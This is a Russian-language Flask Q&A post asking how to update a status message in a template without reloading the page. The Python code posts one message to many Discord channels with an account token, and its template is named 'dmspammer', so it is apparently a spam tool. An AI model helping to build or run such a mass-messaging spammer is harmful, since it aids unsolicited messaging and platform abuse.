# Как быстро обновлять передаваемую строку в шаблон

Tags: python, flask

У меня есть код

```py
 for id in channelIds:
    try:
        requests.post(f'https://discord.com/api/v8/channels/{id}/messages', headers={'Authorization': token},
                        data={"content": msg})
        sendedChannels+=1
        return render_template("dmspammer.html", msgstatus='{"status":"ok","message":"['+str(sendedChannels)+'/'+str(letChannel)+'] Sended message"}')
    except:
        return render_template("dmspammer.html",msgstatus='{"status":"warning","message":"[' + str(sendedChannels) + '/' + str(letChannel) + '] Failed send message"}')
```

так вот, каждый раз обновлять страницу и передавать новый `msgstatus` не есть хорошо, как его передать без обновления страницы.
вот код в шаблоне

```
<p>{{ msgstatus }}</p>
```

Comment: Пожалуйста, исправьте вопрос, чтобы он отражал конкретную проблему с достаточным количеством деталей для возможности дать адекватный ответ.

Comment: @Духсообщества он исправлен коммон почитай внимательно если ты слепой бот